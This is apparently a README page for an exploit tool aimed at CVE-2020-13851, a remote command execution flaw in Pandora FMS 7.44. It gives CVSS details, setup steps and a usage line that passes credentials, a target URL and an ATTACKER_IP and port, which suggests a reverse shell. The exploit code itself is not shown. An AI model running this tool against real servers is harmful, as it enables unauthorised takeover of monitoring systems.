PRIMARY CATEGORY → EXPLOITS

CVE-2020-13851 💥Pandora FMS

Attack Vector 🗡️Remote Command Execution (RCE)

Affected Versions 🚨v7.44 NG

Severity 🚩e.g. High 8.8/10


Description

Reference

Artica Pandora FMS 7.44 allows remote command execution via the events feature


CVSS Score

TL;DR → CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS Base MetricsValues
Attack Vector (AV)Network
Attack Complexity (AC)Low
Privileges Required (PR)Low
User Interaction (UI)None
Scope (S)Unchanged
Confidentiality (C)High
Integrity (I)High
Availability (A)High

Setup

python3 -m venv ./venv
source ./venv/bin/activate
pip install -r ./requirements.txt

Usage

Help Display
python3 CVE-2020-13851.py --help
Script Execution
python3 CVE-2020-13851.py [-u|--user <PANDORA_USER>] [-p|--password PANDORA_PASSWORD] [-c|--cookie PANDORA_COOKIE] <PANDORA_URL> <ATTACKER_IP> <ATTACKER_PORT>

Zoom In


Code

Reference


References

Reference I    •    Reference II    •    Reference III    •    Reference IV